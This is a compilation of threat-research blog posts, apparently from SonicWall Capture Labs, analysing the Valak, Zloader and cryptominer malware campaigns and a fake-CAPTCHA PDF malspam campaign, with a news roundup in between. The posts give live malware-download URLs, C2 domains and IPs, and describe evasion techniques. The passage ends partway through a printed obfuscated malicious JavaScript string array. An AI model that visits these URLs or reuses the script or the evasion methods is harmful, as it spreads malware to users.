Posts

Valak Initial Infection

Overview:

SonicWall Capture Labs Threat Research Team recently observed new activity for Valak. The Valak malware campaign is usually found lurking inside your email inbox or spam folder. The distribution of Valak is attached to an email with a password-protected zip attachment containing a Microsoft related document. Over the last six months or so, Valak has switched from password-protected zip files to HTTP hyperlinks instead.

An example of the HTTP hyperlink:
http://centruldeinfoliere.ro/_qRlDMkyWtPIbz7M5.php?x=MDAwMyBNY5KWcZGMy8k0oIxYUVH2_-u1yUh7ZePvmuNyclVUgcLADWz6g4R0fHir0QUTpjr0UBdTZZveY32hmH7Fx_mkyU3ULfkkoyPTm1HAbKKfvdiUO6QsABHKdzpaK9i6kwgErffcRV6BvyQKLhcSJA~~&y=Ry5fTWljaGFlbCdzX0Jpc3Ryb18mX0Jhci56aXA=
 

Files returned from the URL above listed as SHA256 hash and file size:
– 691e4c75b51448ffb1cb031dea5950ce18fdc843a75a4775f82276c4838d071a File-size: 112,611 bytes
– d3486e1ed6f486f1ca391d9a7b03def818bc977dce3902436d176fa9f7e93289 File-size: 113,635 bytes
– 19cba4e01f15b628ebd46ac48c4b4a28c515c3bb1fd65572970e8b8701ebd874 File-size: 111,587 bytes

Example filename: G._Michael’s_Bistro_&_Bar.zip

SHA256 hashes and document names… (Macro Inside Sample Is For Valak):
– 84a07333851ed300b34b34a026a58636844861e2d5265f2faabddddf05815f21 direct.07.20.doc
– deb7d8bd4c03fac7e23dcbd1e77d9b9d70939072bb13ee884fe6c12ac2f95b99 docs,07.01.2020.doc
– 3eea8f8774723f76413ae73643e0da254837edca2dcefddc8981e2f1f0d871db document_07.20.doc
– 41fdd6d39d225d97db624d1cf2edb76cedaf051b909cdfd100be3e473dcad1f8 file 07.20.doc
– cadc90fa3cf275745d9f925b1cc0d85e5ae44c03b7e904212cb3c91656d0c021 instruct.07.20.doc
– ddf5af999b9ce2eb55e056a84a0185f199f56786986599f02586943d6615ce39 legal agreement-07.20.doc
– 16e28494025fa62cfc22e7d22ff11c47aee04ebff4e7d76f9393499d4f7c72f1 question,07.20.doc
– 8a71f3e2f7bd40f2c98bbe0257e925408cc1c2a56d5a0b70961304609d6e0a72 question_07.01.2020.doc

Today we are going to peek inside the initial Valak DLL retrieved by a Microsoft related document macro. This DLL is provided inside many other hyperlinks listed below:

URLs that supply Valak DLL from documents:http://407.cd.gov.mn/_W54sEoZKl-m2w6RZ.php/?x=MDAwMSDquFjnnQfNskuQwXSFpyH0Z9_qXomuRTk0GI_JRu_fKoAz7nCHxvKoT8dz8tAtY6hCXcf7As15lmDc9hy783iLCvBjCDIJbjSKoo-yMGxsQeXacHaexrHhGtmbv6dHXB6EcntdaN8Mkiq-pA_sQw~~
 
https://bangrajan.org/wp-content/uploads/_m8CVdv47q2JCqgaq.php?x=MDAwMSD_acsCi6_1dic7V-Dk5gCE0DDV3NvQOyIDSnpYLVbLeUSOtixzS9j5_-xegs4j_zu5Lm49dFEVSaWhi1PlZnUr0Pw2gDPaJKfcHs2rPGyw94m8hYSKaHfJSB6c2WK5JcwPXSZMKLoHTbP2UWuljg~~
 
http://centruldeinfoliere.ro/_qRlDMkyWtPIbz7M5.php?x=MDAwMSDKSoJE5lV1GKwb4Ub-pzqjnaQZjzWFvlOnWNYSs9gYKoCD5q1mXjEObRFguTFtWGu6AKCDSBglzHJ-vYeohvLg55dXJ5Zue890q8jHP2jdoP1Tww5YIL58J7-m0i2BPW9hrbOVFEUAgh9TOtEJzQ~~

   

DLL Sample Layer, Static Information:

Looking at the first layer in CFF Explorer, checking for corruption. The first layer is a Native Windows DLL binary.

Static Command-Line Information:

Dynamic Information:

PDB Information:

Dll Main:

Exports:

Inside Wiredifficult:

Obfuscated Buffer:

Call to decode buffer

This is where the decrypted buffer will be called, Call ESI:

After stepping through the call to ESI, the shellcode will build out a small hidden call table as seen below:

Through a variety of calls to VirtualAlloc and dumping modules, full binaries, regions, and custom partial memory regions. You will also have to jump the hurdle of bypassing INT3 calls to arrive at a full decrypted MZ Binary in memory below:

Fully Decrypted:

After the decryption, you will see a Import Address Table get assembled
(Take notice of CreateFileA, & WinExec, 3rd and 6th entry):

If you did everything correctly at this point. You should see a new native Dll binary:

Network Artifacts:

DECOY DOMAINS FOR VALAK C2:

– dev.visualwebsiteoptimizer.com
– rad.msn.com.nsatc.net
– tss-geotrust-crl.thawte.com

MALICIOUS DOMAINS FOR VALAK C2:

– 95.169.182.116 port 80 – delandwinebar.com
– 95.169.182.116 port 80 – yongcan0f.com
– 2020aix.com
– 31pces-walk.com
– 59siwf-farm.com
– 61wsov-ring.com

MALICIOUS DOMAINS FOR ICEDID:

– 165.227.64.184 port 443 – ldrhonda.casa
– 167.71.227.19 port 443 – sweeteator.best
– 167.71.227.19 port 443 – plutiasitop.top

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Valak.AG

Appendix:

Sample SHA256 Hash: fd44086fe5fd433c14f4fc1e03f318353add50ac77dee6da3f64c4d2c5414c1c
File Location: http://detayworx.com/_vsnpNgyXp84Os8Xh.php?x=MDAwMSD7k0uWF2BKCkQGuSvAXqzhVD7pPpu-mirofSGC48QkKx26TywMByaP_nQjE_2EZXGfKy_H-gb2d-aDRgRbUwBi0XgbtTnVlugs38r3vI298UWyMzmQsvid4SyXJOUkCK4dpXj6mXuT7tTBXC3_-w~~

Another cryptominer trojan riding the Coronavirus wave

The pandemic has brought the world to a standstill but has not wavered the cybercriminals. It has been a boon to malware authors and has provided a platform to exploit. The Sonicwall Capture Labs Research team has analyzed yet another cryptominer riding the Coronavirus wave. It comes full featured and capable of killing and deleting files, connecting and downloading additional files, manipulating access controls and file attributes and changing network configuration among many others.

Infection Cycle:

The file comes a Winrar self-extracting archive and uses the following icon:

Within the archive is another self-extracting archive named upx.exe which contains the following files:

  • %temp%/c3.bat
  • %temp%/excludes
  • %temp%/n.vbs

N.vbs executes c3.bat  using Windows Script Host, which is the default for executing scripts in a variety of different languages.

The excludes file contains the mining config:

C3.bat is the main installer file which does a myriad of malicious behaviors including killing and deleting files, connecting to remote servers, changing system policies, among many others.

C3.bat starts by deleting existing users and disables running services:

It then changes file attributes to executable files within the following directories.

It then kills possibly running rival cryptominers:

And then deletes them along with known remote desktop applications:

It then changes access controls to executable files:

It then adds the following registry keys that will allow regsvr32.exe to pass a location of a remote file that will in turn be registered as a COM object every time the infected machine starts up.

To ensure uninterrupted execution it modifies the network configuration:

And to establish persistence on the infected machine it creates a WMI event subscriptions using event handler names such as “coronav” and coronav2”

When the event occurs, it downloads more of the same arbitrary files from remote servers which just ensures infection get reinstated in several different ways.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.BT (Trojan)
  • GAV: Downloader.BAT_4 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 07-10-20

This week, phishing dominated the headlines, as threat actors targeted Office 365 users and senior executives.


SonicWall Spotlight

Contact tracing apps: “It’s better to do it right than quick” — Verdict

  • This podcast on contact tracing technology includes commentary from Bill Conner, who discusses different types of security policies and why security and privacy are of paramount importance.

‘Our direct-touch approach is disrupting the market’ – SonicWall’s new Ireland boss on becoming more than just a firewall vendor — Channel Partner Insight (UK)

  • Ireland Country Manager Tristan Bateup said SonicWall’s channel team in Ireland has been restructured to bring more roles into the country. “We’ve now got people in place in country from a sales and marketing, sales and engineering and obviously a country lead perspective.”

Cybersecurity News

Over 5 Billion Unique Credentials Offered on Cybercrime Marketplaces — Security Week

  • More than 15 billion username and password pairs have been offered on cybercrime marketplaces, including over 5 billion unique credentials.

Researchers connect Evilnum hacking group to cyberattacks against Fintech firms — The Register

  • New report puts a microscope on Evilnum, including its tools, techniques and potential ties to other cyberattackers.

Conti ransomware uses 32 simultaneous CPU threads for blazing-fast encryption — ZDNet

  • The Conti ransomware also abuses the Windows Restart Manager component to unlock apps and free up their data for encryption.

Persuasive Office 365 phishing uses fake Zoom suspension alerts — Bleeping Computer

  • A new phishing campaign targets Microsoft Office 365 corporate users with notices that their Zoom accounts have been suspended, with the end goal of stealing Office 365 logins.

Citrix tells everyone not to worry too much over its latest security patches. NSA’s former top hacker disagrees — The Register

  • Rob Joyce, former head of the NSA’s Tailored Access Operations elite hacking team, warns it’s time for admins to get busy to ensure protection from several exploitable issues, including unauthenticated access and RCE.

Vast Phishing Campaign Hits Microsoft Users in 62 Countries — Bloomberg

  • Microsoft Corp. customers were targeted in a massive phishing campaign that has sought to defraud users in 62 countries since December, with recent emails attempting to exploit the pandemic.

North Korean hackers linked to web skimming (Magecart) attacks, report says — ZDNet

  • After hacking banks and cryptocurrency exchanges, orchestrating ATM cash-outs, and deploying ransomware, North Korean hackers have now set their sights on online stores.

Cerberus Banking Trojan Unleashed on Google Play — Threat Post

  • The Cerberus malware can steal banking credentials, bypass security measures and access text messages.

Looks Like Russian Hackers Are on an Email Scam Spree — Wired

  • A group dubbed “Cosmic Lynx” uses surprisingly sophisticated methods — and targets big game.

Hackers are trying to steal admin passwords from F5 BIG-IP devices — ZDNet

  • Threat actors have already started exploiting the F5 BIG-IP mega-bug, attempting to steal administrator passwords from the hacked devices

New Mac ransomware is even more sinister than it appears – Ars Technica

  • ThiefQuest or EvilQuest can grab passwords and credit card numbers.

In Case You Missed It

Improvements in malicious Excel files distributing Zloader

SonicWall Capture Labs threat research team has been observing improvements in MS Excel document used to distribute ZLoader. Enhancements include addition of techniques to evade detection from conventional signature-based anti-malware engines, hinder debugging and analysis in the sandbox.

Evasion Technique:

In campaigns till now, victims were educated to enable macro through instructions either in plain ASCII text or an image file as shown in Fig1 which allowed their easy detection. To get away detection, threat actors instituted ASCII-Unicode character combination.  When the file is searched for strings as displayed in the instruction, nothing is found. Upon careful inspection of SST records, it is noticed that the message is kept out of sight by cleverly positioning Unicode characters along with ASCII. For example, ‘O’ is represented in Unicode by U+041E. Similarly, Whitespace character is represented by U+00A0, as shown in Fig2 and Fig3


Fig-1: Instructions to enable macros in image

 


Fig-2: Instructions to enable macros appearing in text


Fig-3: combination of characters from ASCII and other character set

Use of Null Character in Label Names:

In MS-Excel, one can assign a human-readable name to refer a single cell or range of cells. What is more appealing in these documents, is the use of NULL characters in the label names making them invisible in functions where they are referred.


Fig-4: Label Record

In the example below, label with NULL characters is referred in function FORMULA.FILL


Fig-5:FORUMA.FILL referring a lable with NULL characters

 

Macro Execution:

The analyzed sample has Auto_open label in a hidden state.  Upon execution, the macro further creates code at run time by concatenating characters as shown below:

Fig-6:Obfuscated macro code

Deobfuscated code :


Fig-7:De-Obfuscated macro code

Anti-Debugging:

GET.WORKSPACE(type_num) function returns information about the workspace where “type_num” specifies the type of information. “type_num” 31 is used to identify if the currently running macro is in single-step mode or not. If this function returns TRUE, the sample terminates execution.

Anti-Sandbox:

It is usually seen that macros are enabled in a sandbox environment for unrestricted execution which means the value of  “vbawarnings” in the registry would be set to 1. To prohibit easy execution and identification, the macro creates a VBS file with code to read data from the Windows registry.

  • HKCU\software\policies\microsoft\office\<Office_Version>\word\security
    • vbawarnings
      • 1 = Enable macros
      • 2 = Disable all with notification
      • 3 = Disable all except digitally signed macros
      • 4 = Disable all without notification

After successful verification, code specific to “Processor_Architectue” is executed. It is interesting to see the use of different “User-Agent” string in HTTP request for different “Processor_Architectue”.

Fig-10:Macro code to download and execute payload

SonicWall RTDMI protects against this threat as shown below:
Fig-11:Capture ATP report

Indicators of Compromise:

SHA256 of malicious Excel Documents:

  • dfea8a755d82ab9ce1b682b2bfc1881870ae2a2688e4dd4c8e46aa8f3694e92d
  • 0e2e0468496a712486ecca944d6d2f1aef86dff048085a7a961014f2c1f9f54f
  • 3a47e61616d44ed737a1c95da222d2dfa4f61f69506e428e642b5a30782606c9
  • 4a6dec8a869d3022341d7afca3df3335eef3d8b481d9727f5a7f2b8f7680ad02
  • 53441c8463caedb2196a5d80399988ff2a288e9ceb464c55fa59905cfb3aec13
  • 66b33cf8a3f0bd3845fdc471d4dd1e19d62d64dcc4019f628a457df2762a4ab7
  • 762ccdb4624dafb1cd5d733eaa871767e42d5f3c3aa669e860f4ea817a5decfc
  • 7984975eb1b283ad5c10e8d7ba3c95478958b48bdb6ccff6c7809a9283d0fad0
  • 7b3c5cb91c2557ecbef03022cf91a8d173bb2d930d4b1cd8eabc00f90a4a83fa
  • 94640ae287f033cfa5e3385f207a09f6013a2c819c3635dfb662df17fd5bae5e
  • b7562a45a3760d0ce10be8ce6fcbf2e50fad02e6118593ffa449dcd619629a2e
  • bf2b2cec3e786c66fe5c9300db4eba39663ab4957e61cdf33a5bbfec30f9dfb1
  • d206b1ff29ba1a35a935ce5d2848dc57d5fe8734dd16b6669577ec521ba3b43a
  • f9be16d3d266dbb5f6b260ce822024ddd386644c43ff8ca8ec434b9f2d5986c8

Network Connection:

  • https://thepsaokhue.com/wp-keys.php
  • https://metagro.com.br/wp-keys.php
  • https://loughturnperceidrin.ml/wp-keys.php
  • https://joliroomlides.tk/wp-keys.php

Massive malspam campaign delivers malicious payloads using fake CAPTHA

SonicWall Capture Labs Threat Research team has come across a new malspam campaign, that pretends to be a legitimate pdf but installs malware on the victim’s computer. When a user opens this PDF, they will be shown a prompt that pretends to be a captcha asking the user to confirm they are human. But this is not a real Google reCAPTCHA, a fake image, clicking on it, take the user to a malicious web page.

 

 

The malspam targets users who use the browser to open the PDF. When the user clicks the CAPTCHA image from Adobe reader, the user gets a warning (see below) that the PDF is trying to connect to the internet. However, when the user launches the pdf in a browser, clicking on the CAPTCHA takes the user to the malicious web page without any prompt/warning.

 

The below malicious web page runs javascript on the client-side before redirecting the user to the payload delivery page. The name of the payload “new+toeic+reading+test” is appended to the URL.

 

 

This Javascript is heavily obfuscated with anti-debugging techniques to protect the script from the analysis. By having the instruction “debugger;”  inside the code, it stops the execution of the script when the debugger hits that instruction. It also implements bot detection techniques ( botFound = 0x1; ) to avoid being detected by good bots like Google safe browsing.  The script is obfuscated using options String Array Rotation and RC4 encryption.

 

<!DOCTYPE html>
<html>
<head>
<title></title>
<script type=”text/javascript”>
{
var _0x5b05 = [‘\x77\x71\x50\x44\x69\x69\x56\x56\x63\x73\x4b\x6b\x50\x73\x4b\x53’, ‘\x45\x63\x4b\x66\x48\x67\x30\x65’, ‘\x58\x4d\x4f\x65\x77\x37\x6e\x43\x74\x38\x4f\x35\x77\x37\x54\x43\x74\x67\x3d\x3d’, ‘\x77\x6f\x58\x44\x69\x47\x76\x44\x6a\x69\x49\x3d’, ‘\x77\x71\x7a\x44\x75\x55\x2f\x44\x74\x79\x38\x3d’, ‘\x77\x70\x4d\x62\x77\x6f\x4e\x50\x77\x6f\x30\x3d’, ‘\x77\x70\x56\x41\x45\x73\x4b\x59\x77\x70\x77\x3d’, ‘\x77\x35\x52\x35\x77\x37\x58\x43\x76\x53\x49\x3d’, ‘\x43\x4d\x4b\x49\x77\x36\x74\x69\x77\x6f\x4e\x46\x77\x72\x4c\x43\x6d\x6b\x59\x3d’, ‘\x77\x34\x54\x43\x6b\x73\x4f\x41\x56\x38\x4b\x6e’, ‘\x51\x4d\x4f\x6c\x77\x35\x7a\x43\x74\x38\x4f\x66’, ‘\x65\x38\x4b\x6c\x77\x35\x62\x43\x73\x6d\x2f\x44\x75\x4d\x4b\x45’, ‘\x50\x32\x76\x43\x73\x38\x4f\x67\x47\x67\x3d\x3d’, ‘\x77\x34\x37\x43\x75\x63\x4b\x48\x44\x6d\x38\x3d’, ‘\x77\x37\x34\x73\x54\x47\x49\x3d’, ‘\x61\x67\x5a\x4f\x77\x37\x5a\x35’, ‘\x77\x70\x4c\x44\x6c\x32\x62\x43\x6d\x42\x52\x4d\x77\x36\x48\x44\x6c\x58\x63\x3d’, ‘\x77\x72\x4c\x44\x71\x7a\x46\x32\x51\x51\x3d\x3d’, ‘\x77\x72\x4e\x71\x45\x4d\x4f\x49\x59\x67\x3d\x3d’, ‘\x46\x47\x33\x43\x70\x4d\x4f\x5a\x4c\x51\x3d\x3d’, ‘\x77\x72\x58\x43\x69\x4d\x4b\x50\x77\x6f\x64\x30\x5a\x41\x62\x44\x72\x67\x3d\x3d’, ‘\x4d\x4d\x4b\x7a\x43\x68\x55\x69\x41\x63\x4f\x33\x77\x34\x4c\x43\x6e\x79\x73\x4d’, ‘\x77\x34\x39\x32\x77\x36\x37\x44\x74\x77\x34\x3d’, ‘\x77\x70\x44\x44\x6b\x67\x56\x34\x63\x41\x3d\x3d’, ‘\x52\x6e\x46\x53\x4f\x4d\x4b\x72\x4d\x4d\x4b\x73\x77\x37\x55\x3d’, ‘\x56\x58\x6f\x6e\x77\x37\x54\x44\x74\x41\x3d\x3d’, ‘\x77\x70\x4a\x38\x62\x63\x4b\x51\x77\x6f\x59\x3d’, ‘\x45\x73\x4f\x51\x77\x70\x31\x55\x42\x67\x3d\x3d’, ‘\x53\x63\x4f\x70\x77\x35\x72\x44\x6e\x69\x6b\x3d’, ‘\x77\x37\x48\x43\x72\x63\x4b\x63\x42\x48\x6b\x3d’, ‘\x77\x70\x70\x47\x58\x52\x4c\x44\x73\x67\x3d\x3d’, ‘\x77\x71\x4a\x32\x48\x63\x4f\x56\x58\x67\x3d\x3d’, ‘\x77\x36\x66\x43\x71\x38\x4f\x50\x49\x63\x4b\x37’, ‘\x77\x72\x66\x43\x76\x63\x4f\x73\x77\x70\x70\x77’, ‘\x4e\x38\x4f\x55\x59\x73\x4b\x67\x77\x70\x6f\x3d’, ‘\x77\x72\x63\x67\x77\x71\x4e\x74\x77\x71\x77\x3d’, ‘\x50\x42\x62\x44\x6c\x38\x4b\x66\x77\x37\x63\x3d’, ‘\x47\x38\x4b\x56\x77\x36\x6c\x6d\x77\x6f\x56\x64\x77\x71\x34\x3d’, ‘\x77\x6f\x35\x2b\x4e\x4d\x4b\x4b\x77\x72\x49\x3d’, ‘\x66\x30\x78\x46\x4f\x73\x4b\x47’, ‘\x4d\x73\x4b\x4e\x77\x37\x4e\x4d\x77\x6f\x45\x3d’, ‘\x77\x35\x4c\x44\x6d\x73\x4f\x7a\x47\x7a\x34\x3d’, ‘\x48\x4d\x4b\x6b\x45\x69\x73\x66’, ‘\x77\x71\x42\x35\x65\x4d\x4b\x61\x77\x72\x77\x3d’, ‘\x77\x72\x54\x44\x69\x68\x74\x52\x61\x63\x4b\x68\x4e\x51\x3d\x3d’, ‘\x77\x70\x56\x6d\x52\x52\x50\x44\x69\x51\x3d\x3d’, ‘\x65\x73\x4b\x7a\x77\x34\x66\x43\x6a\x58\x45\x3d’, ‘\x77\x36\x51\x6b\x50\x73\x4b\x45\x57\x51\x3d\x3d’, ‘\x4b\x38\x4b\x52\x42\x7a\x51\x6d\x77\x71\x54\x44\x72\x43\x38\x3d’, ‘\x77\x34\x4e\x75\x77\x36\x7a\x43\x75\x41\x59\x3d’, ‘\x77\x36\x48\x43\x75\x63\x4f\x4d\x4a\x63\x4b\x6a\x53\x4d\x4f\x34\x64\x41\x3d\x3d’, ‘\x46\x78\x31\x78\x77\x37\x4a\x67\x77\x37\x50\x43\x70\x63\x4f\x68’, ‘\x66\x58\x74\x76\x77\x37\x7a\x44\x6c\x55\x59\x39\x4e\x63\x4b\x38’, ‘\x77\x6f\x78\x4b\x50\x38\x4f\x55\x58\x51\x3d\x3d’, ‘\x51\x47\x4e\x75\x77\x37\x2f\x44\x6c\x41\x3d\x3d’, ‘\x4e\x78\x42\x53\x77\x34\x4a\x52’, ‘\x77\x6f\x45\x2b\x77\x72\x6c\x67\x77\x71\x59\x3d’, ‘\x77\x34\x44\x44\x67\x4d\x4f\x4a\x41\x78\x77\x3d’, ‘\x4d\x73\x4f\x69\x77\x36\x70\x66\x77\x72\x38\x3d’, ‘\x56\x38\x4b\x46\x77\x36\x50\x43\x71\x56\x67\x3d’, ‘\x77\x71\x2f\x43\x69\x63\x4f\x63\x77\x70\x5a\x6e’, ‘\x77\x35\x76\x43\x6c\x4d\x4b\x41\x58\x68\x68\x44\x48\x73\x4b\x35\x53\x41\x3d\x3d’, ‘\x4e\x33\x58\x43\x71\x73\x4f\x34’, ‘\x4e\x63\x4f\x56\x64\x38\x4b\x72\x77\x72\x50\x43\x68\x67\x3d\x3d’, ‘\x77\x72\x67\x66\x77\x72\x70\x5a\x77\x6f\x34\x3d’, ‘\x77\x35\x37\x44\x72\x38\x4f\x72\x59\x44\x67\x3d’, ‘\x77\x70\x66\x44\x76\x38\x4f\x6d\x46\x77\x3d\x3d’, ‘\x77\x34\x76\x44\x71\x38\x4f\x47’, ‘\x77\x36\x38\x6b\x41\x54\x52\x6d’, ‘\x77\x36\x73\x6b\x47\x53\x52\x62’, ‘\x77\x72\x44\x44\x68\x63\x4f\x6f\x4b\x38\x4f\x4c’, ‘\x77\x36\x45\x37\x44\x45\x4c\x43\x72\x4d\x4b\x42\x77\x35\x50\x43\x6a\x38\x4b\x6a’, ‘\x77\x34\x72\x43\x74\x63\x4f\x41\x56\x77\x3d\x3d’, ‘\x53\x73\x4f\x43\x77\x35\x54\x44\x6b\x77\x77\x3d’, ‘\x4c\x6d\x4c\x43\x74\x4d\x4f\x4c\x4a\x51\x3d\x3d’, ‘\x77\x71\x58\x43\x69\x4d\x4b\x2f\x77\x6f\x5a\x72\x61\x41\x62\x44\x76\x51\x3d\x3d’, ‘\x47\x38\x4f\x69\x41\x6a\x34\x59’, ‘\x77\x35\x70\x4f\x77\x37\x54\x44\x72\x77\x34\x3d’, ‘\x42\x77\x44\x44\x70\x38\x4b\x74\x77\x34\x6a\x44\x6b\x31\x4d\x76\x77\x6f\x73\x3d’, ‘\x77\x34\x73\x2f\x42\x52\x35\x63\x77\x36\x49\x6f\x77\x71\x51\x55\x62\x38\x4f\x6a\x4d\x73\x4b\x54\x51\x32\x50\x44\x6e\x43\x4a\x66\x77\x35\x68\x78’, ‘\x64\x43\x52\x4a\x77\x36\x39\x55\x77\x6f\x31\x4f\x77\x35\x33\x44\x6e\x77\x3d\x3d’, ‘\x4f\x78\x58\x44\x6a\x63\x4b\x38\x77\x72\x73\x3d’, ‘\x52\x58\x52\x2f\x4e\x41\x3d\x3d’, ‘\x4b\x58\x58\x43\x6b\x73\x4f\x62\x44\x51\x3d\x3d’, ‘\x64\x33\x34\x7a\x77\x35\x72\x44\x69\x67\x3d\x3d’, ‘\x62\x6d\x68\x73\x77\x36\x54\x44\x71\x6c\x6f\x6c\x4b\x38\x4b\x74\x77\x6f\x6e\x44\x70\x51\x3d\x3d’, ‘\x49\x4d\x4b\x4e\x4e\x78\x55\x58’, ‘\x77\x36\x5a\x4d\x77\x35\x48\x44\x6a\x77\x59\x3d’, ‘\x41\x47\x41\x43\x52\x79\x6a\x43\x72\x73\x4f\x6e’, ‘\x45\x41\x42\x42’, ‘\x77\x34\x38\x4a\x4f\x73\x4b\x54\x58\x41\x3d\x3d’, ‘\x77\x71\x6a\x44\x68\x38\x4f\x37\x54\x69\x55\x3d’, ‘\x4f\x73\x4b\x75\x4c\x54\x77\x7a’, ‘\x44\x38\x4f\x31\x77\x37\x52\x69\x77\x70\x6f\x3d’, ‘\x77\x72\x62\x44\x69\x63\x4b\x65\x57\x41\x3d\x3d’, ‘\x62\x43\x52\x44\x77\x37\x30\x3d’, ‘\x50\x31\x6c\x2b\x77\x71\x30\x79\x77\x72\x44\x44\x6f\x38\x4b\x35\x77\x71\x30\x72\x77\x34\x6a\x44\x6e\x7a\x64\x30\x77\x36\x39\x66\x48\x38\x4f\x39\x77\x72\x48\x44\x6d\x33\x51\x49\x4c\x38\x4b\x74\x77\x6f\x4a\x33\x4f\x51\x64\x32\x77\x36\x6a\x43\x74\x73\x4b\x45\x57\x6b\x38\x3d’, ‘\x77\x34\x52\x62\x77\x37\x37\x44\x6f\x54\x54\x43\x70\x63\x4b\x68\x77\x6f\x30\x3d’, ‘\x58\x33\x59\x37\x77\x36\x44\x44\x71\x51\x3d\x3d’, ‘\x77\x6f\x5a\x51\x5a\x73\x4b\x61\x77\x72\x38\x3d’, ‘\x65\x4d\x4b\x38\x63\x57\x34\x70’, ‘\x47\x38\x4f\x58\x46\x51\x59\x78’, ‘\x77\x71\x66\x44\x6c\x38\x4f\x78\x46\x63\x4f\x53’, ‘\x77\x70\x6c\x58\x77\x37\x6e\x44\x71\x43\x56\x4d\x57\x33\x6e\x44\x76\x77\x3d\x3d’, ‘\x77\x35\x37\x43\x6c\x63\x4b\x4b\x57\x44\x5a\x51\x41\x73\x4b\x6e\x57\x51\x3d\x3d’, ‘\x77\x37\x76\x43\x75\x38\x4f\x57\x4b\x38\x4b\x2f’, ‘\x77\x72\x56\x45\x4e\x38\x4b\x65\x77\x6f\x49\x3d’, ‘\x77\x36\x6e\x43\x76\x63\x4b\x68\x56\x54\x34\x3d’, ‘\x77\x6f\x6c\x54\x58\x52\x4c\x44\x71\x6e\x58\x44\x75\x51\x3d\x3d’, ‘\x77\x72\x2f\x43\x74\x38\x4f\x76\x77\x6f\x78\x4d’, ‘\x77\x35\x59\x48\x42\x44\x64\x4a’, ‘\x44\x42\x48\x44\x76\x38\x4b\x66\x77\x6f\x33\x44\x6b\x4d\x4f\x76\x52\x67\x3d\x3d’, ‘\x77\x36\x48\x43\x73\x4d\x4b\x59\x4b\x45\x66\x44\x6b\x38\x4f\x7a\x61\x51\x3d\x3d’, ‘\x65\x57\x5a\x54\x77\x37\x7a\x44\x69\x46\x73\x71\x49\x67\x3d\x3d’, ‘\x77\x72\x72\x44\x6f\x73\x4b\x52\x63\x4d\x4b\x6c’, ‘\x77\x6f\x4a\x65\x53\x77\x66\x44\x6d\x51\x3d\x3d’, ‘\x5a\x79\x42\x4f\x77\x37\x78\x71’, ‘\x59\x73\x4b\x38\x77\x36\x44\x43\x6a\x48\x51\x3d’, ‘\x77\x37\x2f\x44\x71\x4d\x4f\x36\x41\x51\x55\x3d’, ‘\x77\x35\x70\x52\x77\x36\x33\x44\x72\x43\x48\x43\x72\x38\x4b\x72’, ‘\x52\x55\x68\x39\x4b\x73\x4b\x5a’, ‘\x65\x38\x4b\x6c\x77\x35\x2f\x43\x72\x33\x7a\x44\x73\x77\x3d\x3d’, ‘\x77\x70\x78\x58\x77\x36\x2f\x44\x75\x53\x56\x4c\x44\x54\x50\x43\x72\x38\x4b\x61\x77\x6f\x4c\x43\x75\x42\x6e\x44\x68\x46\x58\x44\x67\x38\x4b\x41\x48\x53\x66\x43\x69\x38\x4b\x4f’, ‘\x62\x45\x70\x58\x77\x34\x4c\x44\x76\x67\x3d\x3d’, ‘\x77\x35\x49\x57\x66\x30\x77\x57’, ‘\x77\x34\x72\x43\x70\x73\x4f\x33\x4d\x4d\x4b\x2f\x56\x63\x4f\x35\x66\x67\x3d\x3d’, ‘\x77\x6f\x39\x5a\x66\x67\x72\x44\x75\x58\x2f\x44\x73\x73\x4b\x44’, ‘\x77\x35\x70\x34\x77\x34\x6e\x43\x6f\x67\x51\x3d’, ‘\x45\x38\x4b\x4b\x77\x36\x64\x73\x77\x6f\x38\x3d’, ‘\x77\x34\x72\x43\x72\x4d\x4f\x58\x4d\x41\x3d\x3d’, ‘\x47\x63\x4b\x4b\x77\x37\x52\x36\x77\x70\x55\x3d’, ‘\x4a\x38\x4f\x65\x77\x37\x6c\x49\x77\x72\x63\x3d’, ‘\x4c\x38\x4f\x52\x4e\x69\x38\x4c’, ‘\x77\x70\x72\x43\x67\x73\x4f\x2b\x77\x70\x64\x43’, ‘\x77\x6f\x62\x44\x72\x73\x4b\x34\x61\x38\x4b\x79’, ‘\x77\x70\x4c\x44\x70\x43\x66\x43\x6b\x69\x67\x3d’, ‘\x58\x57\x46\x47\x77\x34\x48\x44\x6e\x41\x3d\x3d’, ‘\x43\x42\x70\x78\x77\x36\x70\x31’, ‘\x66\x73\x4f\x6d\x77\x37\x6e\x44\x75\x7a\x4d\x3d’, ‘\x77\x35\x7a\x43\x71\x63
\x4b\x65\x4c\x51\x3d\x3d’, ‘\x48\x4d\x4f\x79\x77\x70\x39\x34\x4d\x31\x62\x43\x72\x31\x34\x3d’, ‘\x77\x6f\x52\x2f\x45\x63\x4f\x72\x61\x41\x3d\x3d’, ‘\x62\x73\x4f\x36\x77\x35\x4c\x44\x68\x51\x6f\x3d’, ‘\x54\x73\x4b\x62\x57\x6b\x77\x76\x77\x36\x34\x44\x77\x72\x63\x6d\x77\x71\x30\x4d\x77\x70\x48\x43\x69\x63\x4f\x30\x77\x6f\x4d\x3d’, ‘\x77\x6f\x51\x6a\x77\x71\x56\x41\x77\x6f\x59\x3d’, ‘\x77\x37\x6f\x4e\x46\x77\x68\x4e’, ‘\x4a\x30\x4d\x33\x52\x42\x67\x3d’, ‘\x55\x33\x68\x69\x4a\x41\x3d\x3d’, ‘\x77\x70\x6a\x44\x74\x58\x66\x44\x6a\x67\x6b\x3d’, ‘\x77\x37\x62\x44\x6d\x4d\x4f\x4c\x46\x54\x67\x3d’, ‘\x55\x79\x46\x62\x77\x35\x62\x43\x6d\x6d\x39\x76\x62\x63\x4f\x35\x77\x34\x33\x44\x6b\x31\x76\x44\x72\x6e\x41\x4c\x77\x35\x4c\x43\x6c\x41\x6a\x44\x76\x47\x34\x75\x77\x6f\x33\x43\x6e\x33\x59\x3d’, ‘\x77\x70\x50\x44\x6e\x4d\x4f\x79\x5a\x67\x77\x70’, ‘\x54\x77\x37\x44\x6f\x4d\x4b\x77\x77\x34\x33\x44\x6c\x56\x63\x75\x77\x34\x51\x3d’, ‘\x77\x36\x45\x72\x55\x30\x38\x75’, ‘\x77\x6f\x37\x44\x69\x6d\x72\x43\x6a\x51\x39\x52\x77\x37\x66\x44\x69\x77\x3d\x3d’, ‘\x42\x4d\x4f\x34\x77\x6f\x39\x74’, 